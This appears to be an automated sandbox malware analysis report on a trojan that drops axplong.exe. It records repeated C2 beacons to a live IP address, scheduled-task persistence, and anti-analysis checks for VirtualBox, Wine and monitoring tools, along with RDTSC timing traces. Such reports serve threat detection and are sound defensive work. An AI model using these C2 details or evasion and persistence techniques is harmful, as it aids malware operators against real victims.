                  Source: global trafficHTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 36 46 42 41 31 34 33 43 39 46 43 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C6FBA143C9FCFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                  Source: global trafficHTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                  Source: global trafficHTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 36 46 42 41 31 34 33 43 39 46 43 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C6FBA143C9FCFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                  Source: global trafficHTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                  Source: global trafficHTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 36 46 42 41 31 34 33 43 39 46 43 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C6FBA143C9FCFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                  Source: global trafficHTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                  Source: global trafficHTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 36 46 42 41 31 34 33 43 39 46 43 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C6FBA143C9FCFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                  Source: global trafficHTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                  Source: global trafficHTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 36 46 42 41 31 34 33 43 39 46 43 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C6FBA143C9FCFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                  Source: global trafficHTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                  Source: global trafficHTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 36 46 42 41 31 34 33 43 39 46 43 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C6FBA143C9FCFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                  Source: global trafficHTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                  Source: global trafficHTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 36 46 42 41 31 34 33 43 39 46 43 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C6FBA143C9FCFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                  Source: global trafficHTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                  Source: global trafficHTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 36 46 42 41 31 34 33 43 39 46 43 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C6FBA143C9FCFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                  Source: global trafficHTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                  Source: global trafficHTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 36 46 42 41 31 34 33 43 39 46 43 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C6FBA143C9FCFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                  Source: global trafficHTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                  Source: global trafficHTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 36 46 42 41 31 34 33 43 39 46 43 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C6FBA143C9FCFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                  Source: Joe Sandbox View IP Address: 185.215.113.16
                  Source: Joe Sandbox View ASN Name: WHOLESALECONNECTIONSNL
                  Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Code function: 5_2_0073BD60 InternetOpenW,InternetConnectA,HttpOpenRequestA,HttpSendRequestA,InternetReadFile
                  Source: unknown HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
                  Source: axplong.exe, 00000005.00000002.3015738567.000000000129A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.16/
                  Source: axplong.exe, 00000005.00000002.3015738567.00000000012AF000.00000004.00000020.00020000.00000000.sdmp, axplong.exe, 00000005.00000002.3015738567.00000000012DB000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.php

                  System Summary

                  Source: axplong.exe.0.dr Static PE information: section name:
                  Source: axplong.exe.0.dr Static PE information: section name: .idata
                  Source: axplong.exe.0.dr Static PE information: section name:
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Process Stats: CPU usage > 49%
                  Source: C:\Users\user\Desktop\file.exe File created: C:\Windows\Tasks\axplong.job
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Code function: 5_2_00773068
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Code function: 5_2_00734CF0
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Code function: 5_2_00767D83
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Code function: 5_2_0077765B
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Code function: 5_2_00734AF0
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Code function: 5_2_0077777B
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Code function: 5_2_00778720
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Code function: 5_2_00776F09
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Code function: 5_2_00772BD0
                  Source: axplong.exe.0.dr Static PE information: Section: ZLIB complexity 0.9974987227520435
                  Source: axplong.exe.0.dr Static PE information: Section: sfekpzlc ZLIB complexity 0.9946287643490265
                  Source: classification engine Classification label: mal100.troj.spyw.evad.winEXE@4/3@0/1
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeMutant created: \Sessions\1\BaseNamedObjects\a091ec0a6e22276a96a99c1d34ef679c
                  Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Temp\44111dbc49Jump to behavior
                  Source: C:\Users\user\Desktop\file.exeFile read: C:\Users\desktop.iniJump to behavior
                  Source: C:\Users\user\Desktop\file.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                  Source: file.exeReversingLabs: Detection: 52%
                  Source: file.exeString found in binary or memory: 3Cannot find '%s'. Please, re-install this application
                  Source: axplong.exeString found in binary or memory: 3Cannot find '%s'. Please, re-install this application
                  Source: axplong.exeString found in binary or memory: 3Cannot find '%s'. Please, re-install this application
                  Source: C:\Users\user\Desktop\file.exeFile read: C:\Users\user\Desktop\file.exeJump to behavior
                  Source: unknownProcess created: C:\Users\user\Desktop\file.exe "C:\Users\user\Desktop\file.exe"
                  Source: C:\Users\user\Desktop\file.exeProcess created: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe "C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe"
                  Source: unknownProcess created: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                  Source: C:\Users\user\Desktop\file.exeProcess created: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe "C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe" Jump to behavior
                  Source: C:\Users\user\Desktop\file.exe Section loaded: apphelp.dll, winmm.dll, wininet.dll, sspicli.dll, kernel.appcore.dll, uxtheme.dll, mstask.dll, windows.storage.dll, wldp.dll, mpr.dll, dui70.dll, duser.dll, chartv.dll, onecoreuapcommonproxystub.dll, oleacc.dll, atlthunk.dll, textinputframework.dll, coreuicomponents.dll, coremessaging.dll, ntmarta.dll, wintypes.dll, wtsapi32.dll, winsta.dll, textshaping.dll, propsys.dll, windows.staterepositoryps.dll, windows.fileexplorer.common.dll, iertutil.dll, profapi.dll, explorerframe.dll, edputil.dll, urlmon.dll, srvcli.dll, netutils.dll, appresolver.dll, bcp47langs.dll, slc.dll, userenv.dll, sppc.dll, onecorecommonproxystub.dll
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Section loaded: apphelp.dll, winmm.dll, wininet.dll, kernel.appcore.dll, sspicli.dll, iertutil.dll, windows.storage.dll, wldp.dll, profapi.dll, ondemandconnroutehelper.dll, winhttp.dll, mswsock.dll, iphlpapi.dll, winnsi.dll, urlmon.dll, srvcli.dll, netutils.dll
                  Source: C:\Users\user\Desktop\file.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{148BD52A-A2AB-11CE-B11F-00AA00530503}\InProcServer32
                  Source: file.exe Static file information: File size 1965056 > 1048576

                  Data Obfuscation

                  Source: C:\Users\user\Desktop\file.exe Unpacked PE file: 0.2.file.exe.d70000.0.unpack :EW;.rsrc:W;.idata :W; :EW;sfekpzlc:EW;vvjbpxjb:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;sfekpzlc:EW;vvjbpxjb:EW;.taggant:EW;
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Unpacked PE file: 1.2.axplong.exe.730000.0.unpack :EW;.rsrc:W;.idata :W; :EW;sfekpzlc:EW;vvjbpxjb:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;sfekpzlc:EW;vvjbpxjb:EW;.taggant:EW;
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Unpacked PE file: 5.2.axplong.exe.730000.0.unpack :EW;.rsrc:W;.idata :W; :EW;sfekpzlc:EW;vvjbpxjb:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;sfekpzlc:EW;vvjbpxjb:EW;.taggant:EW;
                  Source: initial sample Static PE information: section where entry point is pointing to: .taggant
                  Source: axplong.exe.0.dr Static PE information: real checksum: 0x1ea687 should be: 0x1e4778
                  Source: axplong.exe.0.dr Static PE information: section name:
                  Source: axplong.exe.0.dr Static PE information: section name: .idata
                  Source: axplong.exe.0.dr Static PE information: section name:
                  Source: axplong.exe.0.dr Static PE information: section name: sfekpzlc
                  Source: axplong.exe.0.dr Static PE information: section name: vvjbpxjb
                  Source: axplong.exe.0.dr Static PE information: section name: .taggant
                  Source: C:\Users\user\Desktop\file.exe Code function: 0_2_04EA026E push 0000005Bh; retn 0008h 0_2_04EA027E
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Code function: 5_2_0074D84C push ecx; ret 5_2_0074D85F
                  Source: axplong.exe.0.dr Static PE information: section name: entropy: 7.986767743552173
                  Source: axplong.exe.0.dr Static PE information: section name: sfekpzlc entropy: 7.954399109377041
                  Source: C:\Users\user\Desktop\file.exe File created: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe (dropped file)

                  Boot Survival

                  Source: C:\Users\user\Desktop\file.exe Window searched: window name: FilemonClass
                  Source: C:\Users\user\Desktop\file.exe Window searched: window name: PROCMON_WINDOW_CLASS
                  Source: C:\Users\user\Desktop\file.exe Window searched: window name: RegmonClass
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Window searched: window name: FilemonClass
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Window searched: window name: PROCMON_WINDOW_CLASS
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Window searched: window name: RegmonClass
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Window searched: window name: Regmonclass
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Window searched: window name: Filemonclass
                  Source: C:\Users\user\Desktop\file.exe File created: C:\Windows\Tasks\axplong.job
                  Source: C:\Users\user\Desktop\file.exe Process information set: NOOPENFILEERRORBOX

                  Malware Analysis System Evasion

                  Source: C:\Users\user\Desktop\file.exe File opened: HKEY_CURRENT_USER\Software\Wine
                  Source: C:\Users\user\Desktop\file.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe File opened: HKEY_CURRENT_USER\Software\Wine
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F8E633 second address: F8E63D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007F389CFCC946h 0x0000000a rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F8E63D second address: F8E641 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F83D7C second address: F83DB3 instructions: 0x00000000 rdtsc 0x00000002 je 00007F389CFCC962h 0x00000008 js 00007F389CFCC946h 0x0000000e jmp 00007F389CFCC956h 0x00000013 push eax 0x00000014 push edx 0x00000015 jp 00007F389CFCC946h 0x0000001b jmp 00007F389CFCC94Bh 0x00000020 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F4E54B second address: F4E570 instructions: 0x00000000 rdtsc 0x00000002 jo 00007F389C838396h 0x00000008 jmp 00007F389C8383A7h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F4E570 second address: F4E576 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F4E576 second address: F4E57E instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 push edx 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F4E57E second address: F4E58A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jno 00007F389CFCC946h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F4E58A second address: F4E58E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F4E58E second address: F4E5BA instructions: 0x00000000 rdtsc 0x00000002 js 00007F389CFCC946h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jl 00007F389CFCC95Ah 0x00000010 jmp 00007F389CFCC954h 0x00000015 pop edx 0x00000016 pop eax 0x00000017 push eax 0x00000018 push edx 0x00000019 push ecx 0x0000001a push esi 0x0000001b pop esi 0x0000001c pop ecx 0x0000001d rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F8F09C second address: F8F0A0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F929EB second address: F92A0E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F389CFCC957h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jbe 00007F389CFCC94Ch 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F93F36 second address: F93F3E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F93F3E second address: F93F42 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F5A1A8 second address: F5A1AC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F5A1AC second address: F5A1B0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F5A1B0 second address: F5A1D0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F389C8383A8h 0x0000000d rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F5377F second address: F53785 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F53785 second address: F537AA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jo 00007F389C838396h 0x0000000d jmp 00007F389C8383A5h 0x00000012 pushad 0x00000013 popad 0x00000014 popad 0x00000015 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F537AA second address: F537B0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F9B575 second address: F9B590 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F389C8383A7h 0x00000009 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F9B590 second address: F9B59A instructions: 0x00000000 rdtsc 0x00000002 ja 00007F389CFCC946h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F9BC84 second address: F9BC88 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F9BC88 second address: F9BC8E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F9BC8E second address: F9BCBF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jnp 00007F389C83839Ch 0x0000000c push ecx 0x0000000d jc 00007F389C838396h 0x00000013 push eax 0x00000014 pop eax 0x00000015 pop ecx 0x00000016 popad 0x00000017 push ebx 0x00000018 jmp 00007F389C83839Eh 0x0000001d pushad 0x0000001e pushad 0x0000001f popad 0x00000020 push eax 0x00000021 push edx 0x00000022 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F9E657 second address: F9E65C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F9E65C second address: F9E661 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F9E661 second address: F9E68C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [esp+04h] 0x0000000d pushad 0x0000000e jno 00007F389CFCC954h 0x00000014 pushad 0x00000015 jl 00007F389CFCC946h 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
